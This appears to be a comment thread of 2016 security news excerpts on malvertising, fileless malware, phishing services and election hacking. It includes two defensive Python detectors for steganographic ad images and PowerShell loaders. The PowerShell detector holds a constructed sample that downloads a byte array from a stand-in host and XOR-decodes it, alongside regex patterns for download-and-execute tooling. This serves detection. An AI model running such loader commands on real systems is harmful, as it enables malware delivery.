In a slight twist on the august pursuit of warwalking, [Mehdi] took a Raspberry Pi armed with a GPS, WiFi, and a Bluetooth sniffer around Bordeaux with him for six months and logged all the data he could find. The result isn’t entirely surprising, but it’s still a little bit creepy.
If your WiFi sends out probe requests for its home access points, [Mehdi] logged it. If your Bluetooth devices leak information about what they are, [Mehdi] logged it. In the end, he got nearly 30,000 WiFis logged, including 120,000 probes. Each reading is timestamped and geolocated, and [Mehdi] presents a few of the results from querying the resulting database.
Bordeaux: a digital urban exploration
https://github.com/mehdilauters/wifiScanMap/blob/master/Results.md
You want to discover your city's public transport infrastructure? Whether the people crossing your street are mainly tourists or neighbors? Check whether you always take the tram with a given person who likes pizza and travels? Or, even more, whether your neighbor is at home right now and usually is at this time?
Tomi Engdahl says:
Phishing-as-a-service is making it easier than ever for hackers to steal your data
http://www.zdnet.com/article/phishing-as-a-service-is-making-it-easier-than-ever-for-hackers-to-steal-data/
Low-cost-of-entry schemes on the dark web mean any wannabe hacker can get their hands on the resources needed to phish specific targets.
Phishing is already the easiest way for hackers to steal data and it’s getting even easier thanks to the rise of organised criminal groups on the dark web offering phishing-as-a-service schemes to budding cybercriminals and ever-lowering the cost of entry.
According to cybersecurity researchers, this approach to phishing is about a quarter of the cost and twice as profitable as traditional unmanaged — and labour intensive — phishing campaigns and follows in the footsteps of other cybercrime-as-a-service campaigns.
The ‘Phishing made easy’ report from Imperva’s Hacker Intelligence Initiative details how a Phishing-as-a-Service (PhaaS) store on the Russian black market offers a “complete solution for the beginner scammer” including databases of emails, templates of phishing scams, and a backend database to store stolen credentials.
At a cost of a maximum of just 270 rubles a month ($4.23), the scammer would be able to make back the cost in no time by stealing and selling profiles.
https://www.imperva.com/docs/Imperva-HII-phishing-made-easy.pdf
Tomi Engdahl says:
Suspects arrested in Russia central bank cyberheist: bank official
http://www.reuters.com/article/us-russia-cenbank-cyberattack-idUSKBN13W2AK?feedType=RSS&feedName=technologyNews&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+reuters%2FtechnologyNews+%28Reuters+Technology+News%29
Russian authorities arrested a large number of suspects in May in connection with the recently revealed electronic theft of $19 million from accounts held at the Russian central bank, an official said on Wednesday.
The bank said last week that hackers had this year used fake client credentials to steal money from correspondent accounts — used to handle transactions on behalf of another bank — at the Bank of Russia.
Banks around the world are tightening the security of their messaging and money transfer networks following a number of cyberattacks – most notably the use of stolen Bangladesh Bank credentials to send SWIFT messages requesting the transfer of nearly $1 billion from its correspondent account at the New York Federal Reserve. The hackers succeeded in transferring $81 million to four accounts in Manila.
Tomi Engdahl says:
US commission whistles to FIDO: Help end ID-based hacks by 2021
No breaches should result from compromised identities, say gov bods
http://www.theregister.co.uk/2016/12/08/us_commission_cybersecurity_recommendations/
A White House commission on improving cybersecurity has come up with a list of recommendations for US president-elect Donald Trump’s administration – including a target for no big hacks to involve identity-based compromises.
The US Commission on Enhancing National Cybersecurity has identified 16 key recommendations on security and growing the digital economy.
Tomi Engdahl says:
Adobe Flash Responsible For Six of the Top 10 Bugs Used By Exploit Kits In 2016
https://it.slashdot.org/story/16/12/08/0011230/adobe-flash-responsible-for-six-of-the-top-10-bugs-used-by-exploit-kits-in-2016
Vulnerabilities in Flash and Internet Explorer dominated the exploit kit landscape in the last year, with a high-profile bug in Flash being found in seven separate kits, new research shows. Exploit kits have long been a key tool in the arsenal of many attackers, from low-level gangs to highly organized cybercrime crews. Their attraction stems from their ease of use and the ability for attackers to add exploits for new vulnerabilities as needed.
Flash Bugs Dominate Exploit Kit Landscape
https://www.onthewire.io/flash-bugs-dominate-exploit-kit-landscape/
Tomi Engdahl says:
Expedia IT guy made $300,000 by hacking own execs
http://money.cnn.com/2016/12/05/technology/expedia-hack-insider-trading-sec/
A former Expedia IT professional admitted on Monday to illegally trading on secrets he discovered by hacking his own company’s senior executives.
Jonathan Ly stole passwords and infiltrated devices of Expedia’s (EXPE) chief financial officer and head of investor relations, allowing him to make a series of “highly profitable” trades in stock options that scored him $331,000, according to prosecutors.
U.S. Attorney Annette Hayes said in a statement that an FBI investigation revealed that Ly “used his employer’s networks to facilitate a get-rich-quick scheme.”
Tomi Engdahl says:
DDoS platform lures hackers to attack websites for points and prizes
The gamification lures hackers into the fold with exploit tools and fraud software up for grabs.
http://www.zdnet.com/article/hackers-turn-ddos-attacks-into-a-game-for-points-and-prizes/
A Turkish cyberattack group is luring individuals to join a DDoS platform to compete for points through games which can be redeemed for hacking tools.
The platform, dubbed Surface Defense, asks hackers to attack political websites using a distributed denial-of-service (DDoS) tool called Balyoz, translated as Sledgehammer.
In order to participate, users recruited from hacking forums must download the Surface Defense collaboration software and register. The platform program then runs locally on a PC, prompting the download of the DDoS attack tool to assault the limited list of target websites.
Traffic is then routed through Tor to disrupt online services.
For every ten minutes spent hammering these websites with fraudulent traffic, participants receive one point which can be traded for tools including a standalone version of Sledgehammer for conducting their own DDoS attacks and “click-fraud” bots used to generate revenue through pay-to-click schemes.
According to Forcepoint Security Labs (.PDF) which discovered the scheme in Turkish Dark Web hacking forums Turkhackteam and Root Developer, a total of 24 websites are on the current list of targets.
https://www.forcepoint.com/sites/default/files/resources/files/datasheet_sledgehammer_the_gamification_of_ddos_attacks_en.pdf
Tomi Engdahl says:
Antivirus is a misnomer. Antivirus companies are no longer just antivirus; but the name has stuck. Everybody accepts that antivirus alone is no longer enough to keep computers and networks safe — but because of the misnomer, new next-gen machine learning endpoint protection vendors have been able to take center stage as antivirus replacement products. Legacy antivirus vendors, like Symantec, Sophos and McAfee have been compelled to release new products to rid themselves of the legacy association. Today Malwarebytes became the latest with the launch of Malwarebytes 3.0.
Source: http://www.securityweek.com/malwarebytes-replaces-antivirus-new-version-30
Tomi Engdahl says:
Cryptography Expert to Audit OpenVPN
http://www.securityweek.com/cryptography-expert-audit-openvpn
VPN service provider Private Internet Access has contracted cryptography expert Matthew Green to conduct a comprehensive audit of the open-source VPN application OpenVPN.
Green, who is a professor of computer science and researcher at Johns Hopkins University in Baltimore, was also involved in auditing the file and disk encryption software TrueCrypt as part of the Open Crypto Audit Project (OCAP).
The expert has been tasked with finding vulnerabilities in OpenVPN 2.4, which is currently a release candidate (rc1). Green will analyze the source code available on GitHub and the results will be compared to the final version of OpenVPN 2.4.
Private Internet Access will make the results of the audit public, but not before ensuring that OpenVPN patches the vulnerabilities discovered by Green.
“The OpenVPN 2.4 audit is important for the entire community because OpenVPN is available on almost every platform and is used in many applications from consumer products such as Private Internet Access VPN to business software such as Cisco AnyConnect,” explained Caleb Chen of Private Internet Access.
Tomi Engdahl says:
Massive Stealthy Malvertising Campaign Uncovered
http://www.securityweek.com/massive-stealthy-malvertising-campaign-uncovered
A stealthy malvertising campaign has been flying under the radar for the last few months, targeting millions of readers visiting popular and mainstream news sites. The campaign is notable for stealth bordering on paranoia from the threat group, probably AdGholas.
In July 2016, Proofpoint published an analysis of a massive AdGholas malvertising campaign that it described as “using a sophisticated combination of techniques including sophisticated filtering and steganography.” It added that AdGholas had ceased operation following exposure, but “the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising.”
Now it appears that AdGholas simply changed tactics, and within a couple of months launched a new campaign described in an ESET research paper published yesterday.
Readers of popular websites targeted by stealthy Stegano exploit kit hiding in pixels of malicious ads
http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/
Millions of readers who visited popular news websites have been targeted by a series of malicious ads redirecting to an exploit kit exploiting several Flash vulnerabilities. Since at least the beginning of October, users might have encountered ads promoting applications calling themselves “Browser Defence” and “Broxu” using banners similar to the ones below:
These advertisement banners were stored on a remote domain with the URL hxxps://browser-defence.com and hxxps://broxu.com.
Without requiring any user interaction, the initial script reports information about the victim’s machine to the attacker’s remote server. Based on server-side logic, the target is then served either a clean image or its almost imperceptibly modified malicious evil twin.
The malicious version of the graphic has a script encoded in its alpha channel.
Using the known Internet Explorer vulnerability CVE-2016-0162, the encoded script attempts to verify that it is not being run in a monitored environment such as a malware analyst’s machine.
The landing page loads a Flash file that is able to exploit three different vulnerabilities (CVE-2015-8651, CVE-2016-1019, CVE-2016-4117).
Upon successful exploitation, the executed shell code collects information on installed security products and performs – as paranoid as the cybercriminals behind this attack – yet another check to verify that it is not being monitored. If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.
The payload is then decrypted and launched via regsvr32.exe or rundll32.exe. Payloads detected so far include backdoors, banking trojans, spyware, file stealers and various trojan downloaders.
An earlier variant of this stealthy exploit pack has been hiding in plain sight since at least late 2014, when we spotted it targeting Dutch customers. In spring 2015 the attackers focused on the Czech Republic and now they have shifted their focus onto Canada, Britain, Australia, Spain and Italy.
In the vast majority of the cases, the advertisement was promoting a product called “Browser Defence” and it has been only recently when we started to detect banners promoting the software “Broxu”.
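The ESET write-up above gives a defender one concrete property to look for: an ad creative whose alpha channel is almost, but not quite, opaque across most of the image, because a script has been written into small alpha adjustments. As an added example (not ESET's detection logic, not code from the campaign), the block below models an RGBA banner as a plain list of tuples, builds three constructed samples (a clean opaque banner, a clean banner with a designer-style fade, and one with bytes hidden in the alpha channel) and applies a "near-opaque but noisy" test. The hiding step is a generic low-bits scheme used only to construct the sample; it is not Stegano's actual encoding. It also shows why a naive "how many distinct alpha values" count does not work: the faded banner and the stego banner have a similar number.

```python
"""Heuristic for ad images whose alpha channel is almost opaque but noisy.
Images are modelled as flat lists of (r, g, b, a) tuples so this runs without
an imaging library. All samples are constructed for the example."""

WIDTH, HEIGHT = 64, 16

# Constructed payload used only to build the stego sample.
PAYLOAD = b"constructed sample payload; " * 15  # 420 bytes -> 840 nibbles


def opaque_banner():
    """Constructed clean banner: every pixel fully opaque."""
    return [(200, 30, 30, 255)] * (WIDTH * HEIGHT)


def faded_banner():
    """Constructed clean banner with a vertical fade. Alpha steps
    0, 18, ..., 252, 255, so only one row (252) lands in the near-opaque band."""
    return [(200, 30, 30, min(255, row * 18))
            for row in range(HEIGHT) for _ in range(WIDTH)]


def embed_in_alpha(pixels, payload):
    """Generic stand-in for the hiding step: each payload nibble lowers one
    pixel's alpha by 0..15, a 0-6% transparency that is invisible to a viewer.
    Not Stegano's real encoding; used here only to construct a realistic sample."""
    out = list(pixels)
    nibbles = []
    for byte in payload:
        nibbles.extend((byte >> 4, byte & 0x0F))
    if len(nibbles) > len(out):
        raise ValueError("payload does not fit in the image")
    for i, n in enumerate(nibbles):
        r, g, b, _ = out[i]
        out[i] = (r, g, b, 255 - n)
    return out


def distinct_alpha_values(pixels):
    """Naive metric: how many different alpha values occur. Shown because it
    does NOT separate a fade from a stego image."""
    return len({a for _, _, _, a in pixels})


def near_opaque_fraction(pixels, low=240, high=254):
    """Fraction of pixels that are 'almost opaque': alpha in [low, high].
    Designers produce 255 (opaque) or real transparency; a large share of
    pixels at 94-99.6% opacity is the noise a hidden payload leaves behind."""
    hits = sum(1 for _, _, _, a in pixels if low <= a <= high)
    return hits / len(pixels)


def is_suspicious(pixels, threshold=0.2):
    """Flag the image when at least `threshold` of its pixels are near-opaque."""
    return near_opaque_fraction(pixels) >= threshold


if __name__ == "__main__":
    samples = {
        "opaque": opaque_banner(),
        "faded": faded_banner(),
        "stego": embed_in_alpha(opaque_banner(), PAYLOAD),
    }
    for name, px in samples.items():
        print(f"{name:6s} distinct_alpha={distinct_alpha_values(px):3d} "
              f"near_opaque={near_opaque_fraction(px):.3f} suspicious={is_suspicious(px)}")
```

The threshold of 0.2 is a constructed starting point, not a tuned value: a real ad-scanning pipeline would calibrate it against the creatives it actually serves, and would treat the heuristic as a triage signal that sends the image to the server-side fetch-and-compare step the article describes (the same ad slot serving a "clean" and an "evil twin" image depending on the visitor).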
Tomi Engdahl says:
ThyssenKrupp Hit by Hackers Eyeing Industrial Secrets
http://www.securityweek.com/thyssenkrupp-hit-hackers-eyeing-industrial-secrets
German heavy industry giant ThyssenKrupp said Thursday it fell victim to a hacking attack in which the perpetrators sought to steal company secrets.
Hackers believed to be from Southeast Asia were trying to obtain “technological know-how and research results” from the steel conglomerate, said a company spokesman, confirming a report in the Wirtschaftswoche weekly.
“The attack is over and had been repelled,” he added.
The “massive cyber attack” had targeted divisions dealing with orders planning of industrial plants and steel works in Europe.
Highly protected parts of the company such as ThyssenKrupp Marine Systems or the IT control systems of the group’s blast furnaces and power plants were not affected.
ThyssenKrupp Marine builds warships including submarines for the German and Israeli navies.
There was no sign of data manipulation or sabotage, it added.
Tomi Engdahl says:
August Stealer Uses PowerShell for Fileless Infection
http://www.securityweek.com/august-stealer-uses-powershell-fileless-infection
A new information-stealing piece of malware called “August” is using Word documents containing malicious macros and is abusing PowerShell for a fileless infection, Proofpoint security researchers warn.
The malware is being distributed by TA530, an actor already known to be involved in highly personalized campaigns. The August distribution campaign, researchers say, was targeting customer service and managerial staff at retailers in an attempt to steal credentials and sensitive documents from the compromised machines.
However, as soon as the recipient opened the document, they would be prompted to enable the macros, which in turn would launch a PowerShell command to download and install the August stealer on the machine. The malicious payload is downloaded from a remote site as a PowerShell byte array, along with a few lines of code to deobfuscate the array through an XOR operation.
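The August description above lists the traits a defender can key on in PowerShell script-block logs: the payload arrives as a byte array fetched from a remote site and is deobfuscated with an XOR operation before running in memory. As an added example (not Proofpoint's or anyone else's detection rule), the block below scores script-block text against a small set of indicators and flags a block when two or more co-occur, which keeps single benign uses (an admin who legitimately uses `-bxor` once) from firing. The two sample command lines are constructed; `example.invalid` is a reserved name and resolves nowhere.

```python
"""Score PowerShell script-block text for the fileless-loader traits described
for the August stealer: remote byte-array download, XOR deobfuscation,
in-memory execution, plus two common launcher flags."""
import re

# Each indicator: (name, regex). Case-insensitive because PowerShell is.
INDICATORS = [
    ("byte_array", re.compile(r"\[byte\[\]\]", re.I)),
    ("web_download", re.compile(
        r"Net\.WebClient|DownloadData|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("xor_loop", re.compile(r"-bxor\b", re.I)),
    ("in_memory_exec", re.compile(
        r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(
        r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def score_script_block(text):
    """Return the names of all indicators present in the script-block text."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def is_fileless_loader(text, min_hits=2):
    """Flag when at least `min_hits` independent indicators co-occur; a single
    indicator is too common in legitimate administration to act on."""
    return len(score_script_block(text)) >= min_hits


# Constructed samples, not captured commands. The suspicious one mirrors the
# article's description (byte array + remote fetch + XOR) without a payload.
BENIGN = (r"Get-ChildItem C:\Logs -Filter *.log | "
          r"Where-Object { $_.Length -gt 1MB } | Remove-Item")
SUSPICIOUS = (r"$k=0x5A;"
              r"$b=[byte[]](New-Object Net.WebClient)"
              r".DownloadData('http://example.invalid/a.gif');"
              r"for($i=0;$i -lt $b.Length;$i++){$b[$i]=$b[$i] -bxor $k}")


if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(f"{label:10s} hits={score_script_block(text)} "
              f"flag={is_fileless_loader(text)}")
```

This only works if script-block logging (Windows PowerShell 5 and later, Event ID 4104) is enabled, because the August chain never writes the decoded payload to disk; the deobfuscated text in the 4104 event is the artifact an investigator gets, so the same indicator list can be applied to the logged scripts after the fact as well as in a live pipeline.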
Tomi Engdahl says:
Experts Propose Cybersecurity Strategy for Nuclear Facilities
http://www.securityweek.com/experts-propose-cybersecurity-strategy-nuclear-facilities
Institutionalizing cybersecurity, reducing complexity, active defenses and transformative research should be a priority in reducing the risk of damaging cyberattacks at nuclear facilities, according to the Nuclear Threat Initiative (NTI).
While the Stuxnet attacks aimed at Iran are the most well-known, nuclear facilities in Germany and South Korea have also been hit by cyberattacks. European Union officials have also raised concerns about the possibility of attacks against Belgium’s nuclear plants.
Reports published in the past months warned that countries are not prepared to handle attacks targeting their nuclear facilities, and the nuclear industry still underestimates cyber security risk.
A report published on Wednesday by the NTI provides a set of recommendations for improving cyber security at nuclear facilities based on a 12-month analysis conducted by an international group of technical and operational experts.
One of the most important priorities involves institutionalizing cybersecurity. Specifically, nuclear facilities should learn from their safety and physical security programs and integrate these practices into their cybersecurity programs.
Another priority should be active defenses. Experts pointed out that a determined adversary will likely be capable of breaching the systems of a nuclear facility and organizations must be prepared to efficiently respond to such incidents.
Reducing the complexity of digital systems should also be a priority for nuclear facilities. Experts recommend minimizing the complexity of digital systems and even replacing them with non-digital or secure-by-design products.
Finally, the NTI recommends conducting transformative research with the goal of developing hard-to-hack systems for critical applications.
“Today’s defenses are no longer adequate, and a fresh look at how to best protect nuclear facilities from cyberattack is needed,” experts wrote in the NTI report. “The threat is too great, and the potential consequences are too high, to remain comfortable with the status quo.”
Tomi Engdahl says:
Homeland Security tied to attempted hack of Georgia’s election database: Report
http://www.cnbc.com/2016/12/08/homeland-security-tied-to-attempted-hack-of-georgias-election-database-report.html
An attempted hack into Georgia’s voter registration database was traced back to the Department of Homeland Security, The Wall Street Journal reported Thursday.
A third-party security firm working for the state detected the unsuccessful breach and linked it to an IP address associated with DHS, the report said. Georgia Secretary of State Brian Kemp reportedly sent a letter to Homeland Security asking the department to confirm whether an attempt was made.
In his letter, The Wall Street Journal reported, Kemp asked the department to confirm whether a scan attempt was made, who authorized the scan and whether the department was scanning other state systems without authorization.
Georgia Says Someone in U.S. Government Tried to Hack State’s Computers Housing Voter Data
http://www.wsj.com/articles/georgia-reports-attempt-to-hack-states-election-database-via-ip-address-linked-to-homeland-security-1481229960
Unsuccessful intrusion came on Nov. 15 apparently via Department of Homeland Security IP address
Tomi Engdahl says:
Georgia says it’s traced an attempted voter hack to the Department of Homeland Security
http://www.pcworld.com/article/3148710/security/georgia-says-its-traced-an-attempted-voter-hack-to-dhs.html
An IP address from the agency was the source of an attempted breach of the state’s voter registration database, according to Georgia’s secretary of state.
Georgia’s secretary of state says the state was hit with an attempted hack of its voter registration database from an IP address linked to the federal Department of Homeland Security.
The allegation by Georgia Secretary of State Brian Kemp is one of the more bizarre charges to come up in the recent spate of alarms about voting-system hacks. He said in a Facebook post on Thursday that he had been made aware of the failed attempt to breach the firewall protecting Georgia’s voter registration database. The attack was traced to an Internet Protocol address associated with DHS, he said.
“This morning I sent a letter to DHS Secretary Jeh Johnson demanding to know why,” he said in the post.
https://www.facebook.com/BrianKempGA/?hc_ref=PAGES_TIMELINE&fref=nf
Tomi Engdahl says:
16 year old hacked DHS system – how can they secure US elections?
http://www.newstarget.com/2016-09-14-16-year-old-hacked-dhs-system-how-can-they-secure-us-elections.html
DHS in particular, is even capable of protecting state balloting systems when it can’t protect its own data from being hacked?
Because if you do believe that they are capable — you shouldn’t.
“We should carefully consider whether our election system, our election process, is critical infrastructure like the financial sector, like the power grid,” Johnson said in recent days. But, as pointed out by We Are Change web site, DHS was hacked recently, and by a 16-year-old kid from England.
As further reported by Fox News in February, the 16-year-old boy managed to hack into systems belonging to both DHS and the FBI, breaching the email accounts of CIA Director John Brennan and DHS’ Johnson.
The hacker told the online webzine Motherboard that he stole names, titles and contact information for 20,000 FBI employees and 9,000 DHS workers. He said the hack was possible using a compromised Justice Department email.
Hacker Plans to Dump Alleged Details of 20,000 FBI, 9,000 DHS Employees
http://motherboard.vice.com/read/hacker-plans-to-dump-alleged-details-of-20000-fbi-9000-dhs-employees
Tomi Engdahl says:
Hacker Lexicon: A Guide to Ransomware, the Scary Hack That’s on the Rise
https://www.wired.com/2015/09/hacker-lexicon-guide-ransomware-scary-hack-thats-rise/
Ransomware is malware that locks your keyboard or computer to prevent you from accessing your data until you pay a ransom, usually demanded in Bitcoin. The digital extortion racket is not new—it’s been around since about 2005, but attackers have greatly improved on the scheme with the development of ransom cryptware, which encrypts your files using a private key that only the attacker possesses, instead of simply locking your keyboard or computer.
Tomi Engdahl says:
Obama Has a Plan to Fix Cybersecurity, But Its Success Depends on Trump
https://www.wired.com/2016/12/obama-cybersecurity-plan/
https://www.whitehouse.gov/sites/default/files/docs/cybersecurity_report.pdf
Tomi Engdahl says:
Panel to Trump: Train 100,000 hackers
http://money.cnn.com/2016/12/02/technology/commission-on-enhancing-national-cybersecurity/
The incoming Trump administration is being advised to train 100,000 hackers.
The new president should also make an effort to develop international norms for hacking, essentially drawing red lines to avoid cyber warfare or even armed conflict.
President Obama’s special Commission on Enhancing National Cybersecurity released its long-awaited report Friday night.
Train 100,000 cybersecurity specialists by 2020
This is a huge number that some cybersecurity experts think is unrealistic. There’s currently a severe shortage of computer scientists who know how to hack — and to defend from hackers.
As a result, salaries are skyrocketing, making it even harder for the government to hire cybersecurity experts. In fact, lots of the talented hackers at the FBI and NSA are leaving for the private sector. It’s something FBI Director James Comey has voiced concern about.
Still, the Trump administration is being advised to create a “national cybersecurity workforce program” that would deliver lots of experts to businesses and government agencies across the country.
Develop international norms for hacking before it’s too late
Cybersecurity experts are particularly keen on this idea. Many have voiced concern that countries are breaking into each others’ computer systems recklessly, putting us at risk of situations that could lead to armed conflict.
“I’m greatly concerned that cyber conflict is the most escalatory kind of warfare we’ve come across,”
Take a closer look at product liability when devices are hackable
Currently, we’re experiencing what cybersecurity expert Joshua Corman has called a “market failure.”
Lots of internet-connected devices have little or no security. But low-end device manufacturers currently have little incentive to spend the extra money to make products secure. And buyers aren’t paying attention.
Other recommendations
The Trump administration is also being advised to issue a “national cybersecurity strategy” in the first six months of his term, and appoint a new “cyber adviser” and “cyber ambassador.”
Most cybersecurity experts say the recommendations are mostly good.
“I think this would be a great start,” said Randy V. Sabett, a Washington lawyer who sat on the last commission that advised President Obama at the start of his presidency.
Tomi Engdahl says:
Jeff Mason / Reuters:
Obama orders US intelligence agencies to conduct a full review of cyber attacks in the 2016 election, and deliver a report before he leaves office
Obama orders review of cyber attacks on 2016 election: adviser
http://www.reuters.com/article/us-usa-election-cyber-idUSKBN13Y1U7
U.S. President Barack Obama ordered intelligence agencies to review cyber attacks and foreign intervention into the 2016 election and deliver a report before he leaves office on Jan. 20, homeland security adviser Lisa Monaco said on Friday.
Monaco told reporters the results of the report would be shared with lawmakers and others.
“The president has directed the intelligence community to conduct a full review of what happened during the 2016 election process … and to capture lessons learned from that and to report to a range of stakeholders, to include the Congress,” Monaco said during an event hosted by the Christian Science Monitor.
Monaco said cyber attacks were not new but might have crossed a “new threshold” this year.
“We’ve seen in 2008 and in this last election system malicious cyber activity,”
Tomi Engdahl says:
David E. Sanger / New York Times:
Sources: Russia hacked Republican National Committee’s systems too but didn’t release data, US intelligence agencies have concluded with “high confidence” — Washington — President Obama has ordered American intelligence agencies to produce a full report on Russian efforts …
Russia Hacked Republican Committee but Kept Data, U.S. Concludes
http://www.nytimes.com/2016/12/09/us/obama-russia-election-hack.html
American intelligence agencies have concluded with “high confidence” that Russia acted covertly in the latter stages of the presidential campaign to harm Hillary Clinton’s chances and promote Donald J. Trump, according to senior administration officials.
They based that conclusion, in part, on another finding — which they say was also reached with high confidence — that the Russians hacked the Republican National Committee’s computer systems in addition to their attacks on Democratic organizations, but did not release whatever information they gleaned from the Republican networks.
In the months before the election, it was largely documents from Democratic Party systems that were leaked to the public. Intelligence agencies have concluded that the Russians gave the Democrats’ documents to WikiLeaks.
“We now have high confidence that they hacked the D.N.C. and the R.N.C., and conspicuously released no documents”
It is unclear how many files were stolen from the Republican committee
The Russians were as surprised as everyone else at Mr. Trump’s victory, intelligence officials said. Had Mrs. Clinton won, they believe, emails stolen from the Democratic committee and from senior members of her campaign could have been used to undercut her legitimacy.
It is possible that in hacking into the Republican committee, Russian agents were simply hedging their bets.
The finding about the Republican committee is expected to be included in a detailed report of “lessons learned” that Mr. Obama has ordered intelligence agencies to assemble before he leaves office on Jan. 20. That report is intended, in part, to create a comprehensive history of the Russian effort to influence the election, and to solidify the intelligence findings before Mr. Trump is sworn in.
Intelligence officials and private cybersecurity companies believe that the Democratic National Committee was hacked by two different Russian cyberunits. One, called “Cozy Bear” or “A.P.T. 29”
The other, the G.R.U.-controlled unit known as “Fancy Bear,” or “A.P.T. 28,” is believed to have created two outlets on the internet, Guccifer 2.0 and DCLeaks, to make Democratic documents public. Many of the documents were also provided to WikiLeaks, which released them over many weeks before the Nov. 8 election.
The messages stolen from Republicans have drawn little attention because most are routine business emails
Tomi Engdahl says:
Jeff Mason / Reuters:
Obama orders US intelligence agencies to conduct a full review of cyber attacks in the 2016 election and deliver a report before he leaves office — U.S. President Barack Obama has ordered intelligence agencies to review cyber attacks and foreign intervention into the 2016 election and deliver …
Obama orders review of 2016 election cyber attacks
http://www.reuters.com/article/us-usa-election-cyber-idUSKBN13Y1U7
Karoun Demirjian / Washington Post:
Leading Senate Republicans are preparing to launch a wide-ranging probe into Russia’s alleged meddling in the US elections, despite Trump’s opposition — Leading Senate Republicans are preparing to launch a coordinated and wide-ranging probe into Russia’s alleged meddling in the U.S. elections …
Republicans ready to launch wide-ranging probe of Russia, despite Trump’s stance
https://www.washingtonpost.com/news/powerpost/wp/2016/12/08/republicans-ready-to-launch-wide-ranging-probe-of-russia-despite-trumps-stance/?utm_term=.0ec978733365
Leading Senate Republicans are preparing to launch a coordinated and wide-ranging probe into Russia’s alleged meddling in the U.S. elections and its potential cyberthreats to the military, digging deep into what they view as corrosive interference in the nation’s institutions.
Such an aggressive approach puts them on a direct collision course with President-elect Donald Trump, who downplays the possibility Russia had any role in the November elections — arguing that a hack of the Democratic National Committee emails may have been perpetrated by “some guy in his home in New Jersey.” The fracture could become more prominent after Trump is inaugurated and begins setting foreign policy. He has already indicated that the country should “get along” with Russia since the two nations have many common strategic goals.
Tomi Engdahl says:
Tim Moynihan / Wired:
How devices like Echo and Home record your voice and why, what they do with the data, and how to scrub those recordings
Alexa and Google Home Record What You Say. But What Happens to That Data?
https://www.wired.com/2016/12/alexa-and-google-record-your-voice/
If you got an Amazon Echo or Google Home voice assistant, welcome to a life of luxurious convenience. You’ll be asking for the weather, the news, and your favorite songs without having to poke around on your phone. You’ll be turning off lights and requesting videos from bed. The world is yours.
But you know what? That little talking cylinder is always listening to you. And not just listening, but recording and saving many of the things you say. Should you freak out? Not if you’re comfortable with Google and Amazon logging your normal web activity, which they’ve done for years. Hell, many other sites have also done it for years. Echo and Home simply continue the trend of saving a crumb trail of queries, except with snippets of your voice.
However, it’s still a reasonable concern for anyone worried about privacy. If you only use Chrome in “Incognito Mode,” put tape over your laptop camera, and worry about snoops sniffing your packets, a web-connected microphone in your home seems risky. It’s a fair thing to be unsettled about. But recording your voice is a major part of how voice assistants work. Here’s how devices like Echo and Home record your voice, why they do it, what they do with the data, and how to scrub those recordings.
How In-Home Voice Assistants Work
Whenever you make a voice request, Google Home and Alexa-enabled devices record or stream audio clips of what you say. Those files are sent to a server—the real brains of the operation—to process the audio and formulate a response. The recorded clips are associated to your user account, and that process is enabled by default.
Because their brains are located miles away, Echo and Home need an internet connection to work. They do have a very rudimentary education, though: The only spoken commands they understand on their own are “wake words” or “activation phrases,” things like “Alexa” or “OK Google.” Once you say those magic words, the voice assistants jump to life, capture your voice request, and sling it to their disembodied cloud brains over Wi-Fi.
That means their mics are listening to you even when you’re not requesting things from Alexa or Google. But those ambient conversations—the things you say before “Alexa” or “OK Google”—aren’t stored or sent over a network.
Why Do They Need to Eavesdrop?
Listening to what you say before a wake word is essential to the entire concept of wake words.
Is This Secure? Can Hackers Tap In and Listen To Me?
Nothing is impossible, but Amazon and Google both have security measures that prevent snoops from wiretapping your home. The audio zipping from your home to Amazon and Google’s data centers is encrypted, so even if your home network is compromised, it’s unlikely that the gadgets can be used as listening devices. A bigger risk is someone getting hold of your Amazon or Google password and seeing a log of your interactions online.
There are also simple measures you can take to prevent Echo and Home from listening to you when you don’t want them to. Each device has a physical mute button, which cuts off the mic completely.
What About Siri?
Siri records your queries too, but she doesn’t catalog them or provide access to the running list of requests. You can’t listen to your history of Siri interactions in Apple’s app universe.
While Apple logs and stores Siri queries
Well, How About Cortana?
Microsoft’s Cortana voice assistant on Windows 10 works a bit differently, but it still mirrors some of your personal information on servers. To customize your experience, Cortana uses a combination of cloud-stored data and on-device data.
What Happens To Your Recorded Audio Clips?
Google users can find everything they’ve asked for by visiting myactivity.google.com while they’re logged into their account. This query museum doesn’t just include voice requests. It also includes any Google searches, YouTube videos, and apps you’ve launched on Android, among other things. It’s all presented in a neat, searchable chronological stack.
How to Stop and Delete Voice Recordings in Google Home
There’s a hardware and a software way to silence Home’s microphone. The easy hardware method is to just tap the “Mute” button on the back of the device. Of course, the Assistant won’t record (or hear) your voice queries while mute is enabled.
How to Stop and Delete Voice Recordings in Alexa
Amazon’s Alexa app doesn’t let you stop recordings altogether, but just like Google Home, there’s a mute button on its Echo devices for temporary privacy.
Tomi Engdahl says:
Hacker Claims To Push Malicious Firmware Update to 3.2 Million Home Routers
https://motherboard.vice.com/read/hacker-claims-to-push-malicious-firmware-update-to-32-million-home-routers
One of the hackers who amassed a new massive army of zombie internet-connected devices that can launch disruptive cyberattacks—even by mistake—now claims to have taken control of 3.2 million home routers, taking advantage of a flaw that allowed anyone to connect to them.
On Monday, the cybercriminal, who calls himself BestBuy, claimed to have set up a server that would automatically connect to vulnerable routers and push a malicious firmware update to them. This, he said, would grant him persistent access and the ability to lock out the owners as well as internet providers and device manufacturers.
“They are ours, even after reboot. They will not accept any new firmware from [Internet Service Provider] or anyone, and connect back to us every time :),” BestBuy said in an online chat. “Bots that cannot die until u throw device into the trash.”
Yet, they all agreed that BestBuy’s story was plausible, and potentially really bad news for the routers’ owners as well as their internet providers.
